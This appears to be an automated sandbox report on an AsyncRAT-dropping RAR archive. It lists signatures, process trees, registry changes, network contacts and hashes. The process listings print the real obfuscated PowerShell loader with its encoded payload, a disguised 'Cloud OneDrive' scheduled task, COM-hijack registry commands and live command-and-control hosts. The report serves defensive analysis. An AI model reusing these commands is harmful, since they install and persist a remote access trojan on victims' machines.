Analysis Overview
SHA256
32f1242ed665427ddd6aeee0ec04728589ad386fcc95a9ceece3a1cee558f9a3
Threat Level: Known bad
The file 17092024_0454_16092024_AG#976832.rar was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-17 04:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-17 04:54
Reported
2024-09-17 04:59
Platform
win7-20240704-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AG#976832.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JiggJEVudjpDT01zUGVDWzQsMTUsMjVdLUpPaW4nJykoIE5FVy1vYkpFQ3QgIElvLlNUckVBbVJlYWRFUiggKE5FVy1vYkpFQ3QgaW8uY09NUFJlU1Npb04uRGVmTGF0ZVN0UkVhTShbSW8ubUVNb3J5c3RSRWFNXSBbQ29uVmVyVF06OkZyT21CQVNFNjRzVHJpTkcoJ3JWbFpidU13REwySzRSR21NUVJrRGxBWTdUMENBN2xINEx1UHFNMFU5VWdwUlQvU2hhSkk2b21yNGw1L3ptWFpsOFV2aTd0dG4rSG42LzdZejkyRmhVLzM4aWV0ZVJmWjR1cWUrRzlFMm9sQUs1NDR0OHl4Y1E2MnZpeEovci9qY2U3WEttbW0zVUhiOC9sQmUyOXBrOXdiZmg4blZoMldzM0lYQlpURnBPQVM4TGg3dGk1WG44OXRQNnYyOW14UitMR1Izdld4K3RVRkdkK3ZaVW1xMTBmU2ZBVDJzUFQ5T3JmQVJSdlhjTHcxaTE0cnc3VjNmY1Qxc0Jqb0Vmck1SZVF2a3V2UHVPbFk4d21EM2V0NnYwVTFSUVpYUmZDU0RGODRpZzVQNU1RVGdDd3NaQXF4Sk9WSFhLY0Q1SE9WQzB1R2Y2V2pacFBLNXNKSEYzL1FSVlFFeFZHakVjekNySXVqU0dzWEFFRk8zTFdmaEc5Q0pvRHd0OXpOTFRQRnYrTDlKQTMwSVdmeWpFYkhLeDdnRys2MDRnRjNTNlBQZmw1N04vRS8yZDdycmJhSWZkd0tXazg2bzcrWlhOR1ZPRG1iVVptMmJIbGxvRE5MV2Z5TWw4Nkx1a01xU1lJb01SdWordmpMZDNjUy9BNkpUWEV2UWV2QkoyNEpkeXZ5VUtWbEtuWVREUlpBVHlkclQ1dWRhc3JaSk9SWnhBWnVtcVBkVTJ3MUxZQlppWU5XdG01MzRjTE8yVjBWdWxtRVZncG4zemhpMWlkZHhrRzVKS0J6REt5TEIxNlZxYUtWNmE2Z09qYUgzei9PSDhJMSszZ3VzY3VVNHp1Uk1OdGhCVUVhSktHTEQ0Zi9JSGhyOE1rMFE2UnByOEVtdVRuM1VKei9rSFlwenE4bEJlWk1HSDU1bjExR2FsajZ0RnZpb3VYaVB0SEZudTk4dVlzRFZud3FyVHEzS1lxbDlnbDhSMlZwTXIxcUtYT082aHZJV2dBdklOVDdWZ3JueDRucU8wL1Y5YUFXSGx1TmxjNnoyNHhlVXBRWno5S0k1TitESzVHZENXZ0tmcFo3dEJSdGw1K0pEQVJjcEE4Qm5JRmtmYkV5a09rUExEejY1UEZXN3JHcUVOYXJsckFPZG5CdWQ4b0dBbmRNTFk2REdvYWNFZWJpa1grbzJsQ25qQ3hvRC9GK3c5VGVqMTVkcHBPVXZQZTJEVFRidmVaTU16NEdZWlhUQ2VvM0VLM3ZkdXk3VjV4UDdkZG5FTW5hREJlYzl5dHRDT0lvejB4N1NqVVZtUVFpb2swTWNEUVFSNW91d2xxK0dJMUlTZ2pLbWxMNkZtdjRURHd4R2FobHBoNnhLVmJqOGFTZE9TYVNtSVpXWDA1bUpoL1J3VzdJdCtYZ2l0cHVQYXZ4YUw4NE53RzRNdG5MZTlKN3gxcm01WWd4cW9lb3YyMU9PVkcwdFg2NnYycjh3aUJLZHhlQlB4MHZ1dUlPM1dNWWkxcHAvNTJoUWl2d3NuUzkwWmlNNlFsUjFMNXA5VUNkZkdWdGhwWFpwR21PaW9xbldqeG1mUldIdnhwZUlNRU4zenBnV1RHSjJ2Z2tCNUFXdDJTMEUzR0QvUkptVjdXK050bWdGUDZPMUdUR3dldmY5Q0JxUEwxTXZ4enB0VitySnppbjRlY3gyT1ZQakFoZFduc0hNdmdDVlIzQVRtb29NNW40OGVScE9kWGcwVTFuRXVsQWVkeTF5NlpkQTFpaHNVSllhNGQwanBJanJVRTlEV1dxbndsSmI3ejlXOGtKeGdmb1FQVlJSV3NlQjlFQ1hoaVVRUTBRZTh0bkFWWmVuYkJISys5bG8vSElUd2UzVm1pVkwyNEtPMzMxRmI4QVc1Yi8nKSwgW0lvLkNPbXBSZXNzaW9uLmNPTVByRVNTSW9ubU9kZV06OkRFY09NUHJFc3MpKSAsIFtzWVNURW0udEVYdC5FTkNvZEluZ106OmFzY0lpKSApLlJFQUR0T0VuRCgp'));powershell $udvqhnorgmakexczpfbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('rVlZbuMwDL2K4RGmMQRkDlAY7T0CA7lH4LuPqM0U9UgpRT/ShaJI6omr4l5/zmXZl8Uvi7ttn+Hn6/7Yz92FhU/38ieteRfZ4uqe+G9E2olAK544t8yxcQ62vixJ/r/jce7XKmmm3UHb8/lBe29pk9wbfh8nVh2Ws3IXBZTFpOAS8Lh7ti5Xn89tP6v29mxR+LGR3vWx+tUFGd+vZUmq10fSfAT2sPT9OrfARRvXcLw1i14rw7V3fcT1sBjoEfrMReQvkuvPuOlY8wmD3et6v0U1RQZXRfCSDF84ig5P5MQTgCwsZAqxJOVHXKcD5HOVC0uGf6WjZpPK5sJHF3/QRVQExVGjEczCrIujSGsXAEFO3LWfhG9CJoDwt9zNLTPFv+L9JA30IWfyjEbHKx7gG+604gF3S6PPfl57N/E/2d7rrbaIfdwKWk86o7+ZXNGVODmbUZm2bHlloDNLWfyMl86LukMqSYIoMRuj+vjLd3cS/A6JTXEvQevBJ24JdyvyUKVlKnYTDRZATydrT5udasrZJORZxAZumqPdU2w1LYBZiYNWtm534cLO2V0VulmEVgpn3zhi1iddxkG5JKBzDKyLB16VqaKV6a6gOjaH3z/OH8I1+3guscuU4zuRMNthBUEaJKGLD4f/IHhr8Mk0Q6Rpr8EmuTn3UJz/kHYpzq8lBeZMGH55n11Galj6tFviouXiPtHFnu98uYsDVnwqrTq3KYql9gl8R2VpMr1qKXOO6hvIWgAvINT7Vgrnx4nqO0/V9aAWHluNlc6z24xeUpQZz9KI5N+DK5GdCWgKfpZ7tBRtl5+JDARcpA8BnIFkfbEykOkPLDz65PFW7rGqENarlrAOdnBud8oGAndMLY6DGoacEebikX+o2lCnjCxoD/F+w9Tej15dppOUvPe2DTTbveZMMz4GYZXTCeo3EK3vduy7V5xP7ddnEMnaDBec9yttCOIoz0x7SjUVmQQiok0McDQQR5ouwlq+GI1ISgjKmlL6Fmv4TDwxGahlph6xKVbj8aSdOSaSmIZWX05mJh/RwW7It+XgitpuPavxaL84NwG4MtnLe9J7x1rm5Ygxqoeov21OOVG0tX66v2r8wiBKdxeBPx0vuuIO3WMYi1pp/52hQivwsnS90ZiM6QlR1L5p9UCdfGVthpXZpGmOioqnWjxmfRWHvxpeIMEN3zpgWTGJ2vgkB5AWt2S0E3GD/RJmV7W+NtmgFP6O1GTGwevf9CBqPL1MvxzptV+rJzin4ecx2OVPjAhdWnsHMvgCVR3ATmooM5n48eRpOdXg0U1nEulAedy1y6ZdA1ihsUJYa4d0jpIjrUE9DWWqnwlJb7z9W8kJxgfoQPVRRWseB9ECXhiUQQ0Qe8tnAVZenbBHK+9lo/HITwe3VmiVL24KO331Fb8AW5b/'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
Files
memory/2276-4-0x000007FEF554E000-0x000007FEF554F000-memory.dmp
memory/2276-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2276-10-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-9-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-8-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-7-0x0000000001D20000-0x0000000001D28000-memory.dmp
memory/2276-6-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-11-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c276a833630cfdd812189011810d59c3 |
| SHA1 | 3743da8d538c706f2f3ecda52d00b55a8ba7d7c9 |
| SHA256 | f4e4d3619b5c87726482f5afdc8d061272cc11ddf257da17232b7aa2e9d41b60 |
| SHA512 | 2d87bec542d38b88a103e1d94d1a9247647577ad7c0d0c256ad5bfdf09dec9bcfe961a51bc0a14da35a74f965c83a1efe2fc55e545b270c7c648bd9241db2207 |
memory/2276-17-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-18-0x000007FEF554E000-0x000007FEF554F000-memory.dmp
memory/2276-19-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-17 04:54
Reported
2024-09-17 05:00
Platform
win10v2004-20240802-en
Max time kernel
249s
Max time network
304s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AG#976832.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JiggJEVudjpDT01zUGVDWzQsMTUsMjVdLUpPaW4nJykoIE5FVy1vYkpFQ3QgIElvLlNUckVBbVJlYWRFUiggKE5FVy1vYkpFQ3QgaW8uY09NUFJlU1Npb04uRGVmTGF0ZVN0UkVhTShbSW8ubUVNb3J5c3RSRWFNXSBbQ29uVmVyVF06OkZyT21CQVNFNjRzVHJpTkcoJ3JWbFpidU13REwySzRSR21NUVJrRGxBWTdUMENBN2xINEx1UHFNMFU5VWdwUlQvU2hhSkk2b21yNGw1L3ptWFpsOFV2aTd0dG4rSG42LzdZejkyRmhVLzM4aWV0ZVJmWjR1cWUrRzlFMm9sQUs1NDR0OHl4Y1E2MnZpeEovci9qY2U3WEttbW0zVUhiOC9sQmUyOXBrOXdiZmg4blZoMldzM0lYQlpURnBPQVM4TGg3dGk1WG44OXRQNnYyOW14UitMR1Izdld4K3RVRkdkK3ZaVW1xMTBmU2ZBVDJzUFQ5T3JmQVJSdlhjTHcxaTE0cnc3VjNmY1Qxc0Jqb0Vmck1SZVF2a3V2UHVPbFk4d21EM2V0NnYwVTFSUVpYUmZDU0RGODRpZzVQNU1RVGdDd3NaQXF4Sk9WSFhLY0Q1SE9WQzB1R2Y2V2pacFBLNXNKSEYzL1FSVlFFeFZHakVjekNySXVqU0dzWEFFRk8zTFdmaEc5Q0pvRHd0OXpOTFRQRnYrTDlKQTMwSVdmeWpFYkhLeDdnRys2MDRnRjNTNlBQZmw1N04vRS8yZDdycmJhSWZkd0tXazg2bzcrWlhOR1ZPRG1iVVptMmJIbGxvRE5MV2Z5TWw4Nkx1a01xU1lJb01SdWordmpMZDNjUy9BNkpUWEV2UWV2QkoyNEpkeXZ5VUtWbEtuWVREUlpBVHlkclQ1dWRhc3JaSk9SWnhBWnVtcVBkVTJ3MUxZQlppWU5XdG01MzRjTE8yVjBWdWxtRVZncG4zemhpMWlkZHhrRzVKS0J6REt5TEIxNlZxYUtWNmE2Z09qYUgzei9PSDhJMSszZ3VzY3VVNHp1Uk1OdGhCVUVhSktHTEQ0Zi9JSGhyOE1rMFE2UnByOEVtdVRuM1VKei9rSFlwenE4bEJlWk1HSDU1bjExR2FsajZ0RnZpb3VYaVB0SEZudTk4dVlzRFZud3FyVHEzS1lxbDlnbDhSMlZwTXIxcUtYT082aHZJV2dBdklOVDdWZ3JueDRucU8wL1Y5YUFXSGx1TmxjNnoyNHhlVXBRWno5S0k1TitESzVHZENXZ0tmcFo3dEJSdGw1K0pEQVJjcEE4Qm5JRmtmYkV5a09rUExEejY1UEZXN3JHcUVOYXJsckFPZG5CdWQ4b0dBbmRNTFk2REdvYWNFZWJpa1grbzJsQ25qQ3hvRC9GK3c5VGVqMTVkcHBPVXZQZTJEVFRidmVaTU16NEdZWlhUQ2VvM0VLM3ZkdXk3VjV4UDdkZG5FTW5hREJlYzl5dHRDT0lvejB4N1NqVVZtUVFpb2swTWNEUVFSNW91d2xxK0dJMUlTZ2pLbWxMNkZtdjRURHd4R2FobHBoNnhLVmJqOGFTZE9TYVNtSVpXWDA1bUpoL1J3VzdJdCtYZ2l0cHVQYXZ4YUw4NE53RzRNdG5MZTlKN3gxcm01WWd4cW9lb3YyMU9PVkcwdFg2NnYycjh3aUJLZHhlQlB4MHZ1dUlPM1dNWWkxcHAvNTJoUWl2d3NuUzkwWmlNNlFsUjFMNXA5VUNkZkdWdGhwWFpwR21PaW9xbldqeG1mUldIdnhwZUlNRU4zenBnV1RHSjJ2Z2tCNUFXdDJTMEUzR0QvUkptVjdXK050bWdGUDZPMUdUR3dldmY5Q0JxUEwxTXZ4enB0VitySnppbjRlY3gyT1ZQakFoZFduc0hNdmdDVlIzQVRtb29NNW40OGVScE9kWGcwVTFuRXVsQWVkeTF5NlpkQTFpaHNVSllhNGQwanBJanJVRTlEV1dxbndsSmI3ejlXOGtKeGdmb1FQVlJSV3NlQjlFQ1hoaVVRUTBRZTh0bkFWWmVuYkJISys5bG8vSElUd2UzVm1pVkwyNEtPMzMxRmI4QVc1Yi8nKSwgW0lvLkNPbXBSZXNzaW9uLmNPTVByRVNTSW9ubU9kZV06OkRFY09NUHJFc3MpKSAsIFtzWVNURW0udEVYdC5FTkNvZEluZ106OmFzY0lpKSApLlJFQUR0T0VuRCgp'));powershell $udvqhnorgmakexczpfbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('rVlZbuMwDL2K4RGmMQRkDlAY7T0CA7lH4LuPqM0U9UgpRT/ShaJI6omr4l5/zmXZl8Uvi7ttn+Hn6/7Yz92FhU/38ieteRfZ4uqe+G9E2olAK544t8yxcQ62vixJ/r/jce7XKmmm3UHb8/lBe29pk9wbfh8nVh2Ws3IXBZTFpOAS8Lh7ti5Xn89tP6v29mxR+LGR3vWx+tUFGd+vZUmq10fSfAT2sPT9OrfARRvXcLw1i14rw7V3fcT1sBjoEfrMReQvkuvPuOlY8wmD3et6v0U1RQZXRfCSDF84ig5P5MQTgCwsZAqxJOVHXKcD5HOVC0uGf6WjZpPK5sJHF3/QRVQExVGjEczCrIujSGsXAEFO3LWfhG9CJoDwt9zNLTPFv+L9JA30IWfyjEbHKx7gG+604gF3S6PPfl57N/E/2d7rrbaIfdwKWk86o7+ZXNGVODmbUZm2bHlloDNLWfyMl86LukMqSYIoMRuj+vjLd3cS/A6JTXEvQevBJ24JdyvyUKVlKnYTDRZATydrT5udasrZJORZxAZumqPdU2w1LYBZiYNWtm534cLO2V0VulmEVgpn3zhi1iddxkG5JKBzDKyLB16VqaKV6a6gOjaH3z/OH8I1+3guscuU4zuRMNthBUEaJKGLD4f/IHhr8Mk0Q6Rpr8EmuTn3UJz/kHYpzq8lBeZMGH55n11Galj6tFviouXiPtHFnu98uYsDVnwqrTq3KYql9gl8R2VpMr1qKXOO6hvIWgAvINT7Vgrnx4nqO0/V9aAWHluNlc6z24xeUpQZz9KI5N+DK5GdCWgKfpZ7tBRtl5+JDARcpA8BnIFkfbEykOkPLDz65PFW7rGqENarlrAOdnBud8oGAndMLY6DGoacEebikX+o2lCnjCxoD/F+w9Tej15dppOUvPe2DTTbveZMMz4GYZXTCeo3EK3vduy7V5xP7ddnEMnaDBec9yttCOIoz0x7SjUVmQQiok0McDQQR5ouwlq+GI1ISgjKmlL6Fmv4TDwxGahlph6xKVbj8aSdOSaSmIZWX05mJh/RwW7It+XgitpuPavxaL84NwG4MtnLe9J7x1rm5Ygxqoeov21OOVG0tX66v2r8wiBKdxeBPx0vuuIO3WMYi1pp/52hQivwsnS90ZiM6QlR1L5p9UCdfGVthpXZpGmOioqnWjxmfRWHvxpeIMEN3zpgWTGJ2vgkB5AWt2S0E3GD/RJmV7W+NtmgFP6O1GTGwevf9CBqPL1MvxzptV+rJzin4ecx2OVPjAhdWnsHMvgCVR3ATmooM5n48eRpOdXg0U1nEulAedy1y6ZdA1ihsUJYa4d0jpIjrUE9DWWqnwlJb7z9W8kJxgfoQPVRRWseB9ECXhiUQQ0Qe8tnAVZenbBHK+9lo/HITwe3VmiVL24KO331Fb8AW5b/'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 88.119.175.153:8808 | tcp | |
| US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp |
Files
memory/2096-0-0x00007FFF67963000-0x00007FFF67965000-memory.dmp
memory/2096-1-0x0000017A5FB30000-0x0000017A5FB52000-memory.dmp
